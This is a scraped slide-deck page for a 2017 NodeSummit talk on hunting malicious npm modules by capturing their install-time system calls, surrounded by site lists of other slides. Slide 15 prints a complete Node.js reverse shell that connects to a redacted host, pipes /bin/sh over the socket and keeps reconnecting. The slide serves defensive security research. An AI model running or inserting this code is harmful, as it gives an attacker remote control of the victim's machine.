Hunting for malicious modules in npm - NodeSummit

Adam BaldwinFollow

Product Manager at GitHub

Jul. 27, 2017•0 likes•384 views

Hunting for malicious modules in npm - NodeSummit

Hunting for malicious modules in npm - NodeSummit

Jul. 27, 2017•0 likes•384 views

Download to read offline

Technology

Ever since the threat of an npm worm became public we've been thinking about how to detect malicious modules in our ecosystem and how to provide security teams auditing modules with tooling and intel to make informed decisions about module risk. We've built a system to analyze modules based on their installation behavior. This talk will discuss the results of this endeavor and share the interesting findings from this new and previously unexplored dataset and try to answer the question if a npm worm is lurking in the shadows.

Adam BaldwinFollow

Product Manager at GitHub

What's hot

Security Challenges in Node.jsWebsecurify3.3K views•46 slides

Continuous testing In PHPEric Hogue758 views•108 slides

AnyeventMarian Marinov1.1K views•8 slides

Serenity NowDaniel MacTough67 views•20 slides

Async programming on NETyuyijq635 views•23 slides

Getting started with TDD - Confoo 2014Eric Hogue1.6K views•88 slides

What's hot(20)

Security Challenges in Node.js

Websecurify•3.3K views

Continuous testing In PHP

Eric Hogue•758 views

Anyevent

Marian Marinov•1.1K views

Serenity Now

Daniel MacTough•67 views

Async programming on NET

yuyijq•635 views

Getting started with TDD - Confoo 2014

Eric Hogue•1.6K views

Devel::NYTProf::Apache

Tokuhiro Matsuno•1.8K views

I love Automation

Takayuki Miyauchi•7.5K views

Xdebug - Your first, last, and best option for troubleshooting PHP code

Adam Englander•6.2K views

Diff

yosuke_shimada•135 views

Aspdevice - Asp Fast Crud introdution

Adriano Mendes•597 views

Autobots @ REA

ggiesemann•344 views

NoSQL Injections in Node.js - The case of MongoDB

Sqreen•54.5K views

Metis - RubyConf 2011 Lightning Talk

Ken Robertson•701 views

clara-rules

Ikuru Kanuma•1.4K views

Spark手把手:[e2-spk-s03]

Erhwen Kuo•957 views

Sge

Chris Roeder•838 views

Yapc::Asia 2008 Tokyo - Easy system administration programming with a framewo...

Gosuke Miyashita•1.5K views

Postman On Steroids

Sara Tornincasa•298 views

Puppet and Openshift

Gareth Rushgrove•929 views

Similar to Hunting for malicious modules in npm - NodeSummit

evil_server.cpp#include string #include cstdlib #include.pdffortmdu2 views•12 slides

Much ado about randomness. What is really a random number?Aleksandr Yampolskiy3.1K views•36 slides

SSL Failing, Sharing, and SchedulingDavid Evans3.3K views•44 slides

Automated code auditsDamien Seguy591 views•25 slides

Test flawfinder. This program wont compile or run; thats notMoseStaton393 views•11 slides

Applications secure by defaultSlawomir Jasek515 views•100 slides

Similar to Hunting for malicious modules in npm - NodeSummit(20)

evil_server.cpp#include string #include cstdlib #include.pdf

fortmdu•2 views

Much ado about randomness. What is really a random number?

Aleksandr Yampolskiy•3.1K views

SSL Failing, Sharing, and Scheduling

David Evans•3.3K views

Automated code audits

Damien Seguy•591 views

Test flawfinder. This program wont compile or run; thats not

MoseStaton39•3 views

Applications secure by default

Slawomir Jasek•515 views

Applications secure by default

SecuRing•1.9K views

Node.JS security

Deepu S Nath•1.9K views

Creating "Secure" PHP Applications, Part 1, Explicit Code & QA

archwisp•2.3K views

Putting Rugged Into your DevOps Toolchain

James Wickett•1.8K views

Be Mean to Your Code

James Wickett•3.1K views

Da APK al Golden Ticket

Giuseppe Trotta•419 views

OWASP Poland Day 2018 - Pedro Fortuna - Are your Java Script based protection...

OWASP•134 views

Артем Маркушев - JavaScript

DataArt•680 views

Insecure coding in C (and C++)

Olve Maudal•22.1K views

Test driven node.js

Jay Harris•5.3K views

Keep it simple web development stack

Mat Schaffer•823 views

Future Decoded - Node.js per sviluppatori .NET

Gianluca Carucci•235 views

Recently uploaded

Reward Innovation for long-term member satisfactionJiangwei Pan46 views•18 slides

Cloud Study Jam ppt.pptxPoorabpatel31 views•9 slides

OpenAI API crash courseDimitrios Platis22 views•42 slides

RemeOs science and clinical data 20230926_PViv2 (4).pptxPetrusViitanen122 views•14 slides

"Stateful app as an efficient way to build dispatching for riders and drivers...Fwdays48 views•46 slides

Take Control of Podcasting thanks to Open Source and Podcasting 2.0🎙 Benjamin Bellamy80 views•59 slides

Recently uploaded(20)

Reward Innovation for long-term member satisfaction

Jiangwei Pan•46 views

Cloud Study Jam ppt.pptx

Poorabpatel•31 views

OpenAI API crash course

Dimitrios Platis•22 views

RemeOs science and clinical data 20230926_PViv2 (4).pptx

PetrusViitanen1•22 views

"Stateful app as an efficient way to build dispatching for riders and drivers...

Fwdays•48 views

Take Control of Podcasting thanks to Open Source and Podcasting 2.0

🎙 Benjamin Bellamy•80 views

Google cloud Study Jam 2023.pptx

GDSCNiT•489 views

"Building Asynchronous SOA for Modern Applications", Sai Pragna Etikyala

Fwdays•33 views

Solving today’s Traffic Problems with Sustainable Ride Hailing Solution

On Demand Clone•44 views

"The Intersection of architecture and implementation", Mark Richards

Fwdays•53 views

Accelerating Data Science through Feature Platform, Transformers and GenAI

FeatureByte•127 views

Dennis Wendland_The i4Trust Collaboration Programme.pptx

FIWARE•16 views

"Exploring MACH Principles", Nikita Galkin

Fwdays•21 views

Deep Dive Microsoft Viva Insights - Collabdays Bletchley Park 2023

Chirag Patel•18 views

Common WordPress APIs_ Settings API

Jonathan Bossenger•32 views

Need for Speed: Removing speed bumps in API Projects

Łukasz Chruściel•140 views

10 reasons to choose Galaxy Tab S9 for work on the go

Samsung Business USA•95 views

"Data Mesh in Kubernetes", Andrii Syniuk

Fwdays•17 views

The Flutter Job Market At The Moment

Ahmed Abu Eldahab•44 views

GDSC Cloud Lead Presentation.pptx

AbhinavNautiyal8•92 views

Hunting for malicious modules in npm - NodeSummit

1. Hunting for Malicious Modules in

2. adam_baldwin evilpacket

3. liftsecurity.io

4. nodesecurity.io Continous Security Monitoring

5. Hunting for Malicious Modules in

6. WHY SHOULD WE HUNT?

7. 🕯 Hey, I can publish malicious code to npm

8. 💨 this is bad.

9. 🔥 install scripts are BAD!

10. 💩 JavaScript BAD!

11. rimrafall

12. npm hydra worm

13. WHAT ARE WE HUNTING?

14. WHAT DEFINES MALICIOUS BEHAVIOR?

15. var net = require('net'); var daemon = require('daemon'); var spawn = require('child_process').spawn; function c() { var client = new net.Socket(); client.connect(443, "REDACTED", function() { var sh = spawn('/bin/sh', []); client.write("Connectedrn"); client.pipe(sh.stdin); sh.stdout.pipe(client); }); client.on('error', function() {}); client.on('close', function() { setTimeout(c, 5000); }); } require('daemon')(); c(); 😈 Example

16. client.connect(443, "REDACTED", function() { var sh = spawn('/bin/sh', []);

17. WHERE ARE WE HUNTING?

19. 507,573 modules

20. 3,443,784 individual versions

21. 242,505,822 individual ﬁles

22. 21,756 modules with install scripts

23. HOW AM I HUNTING?

24. MIRROR REGISTRY

25. INDEX MODULES Filenames Extensions Content Hash

26. npm install module syscall capture DB

27. npm publish GCS PubSubInstrumentation npm i raw data 🎉

28. ~24,000 modules processed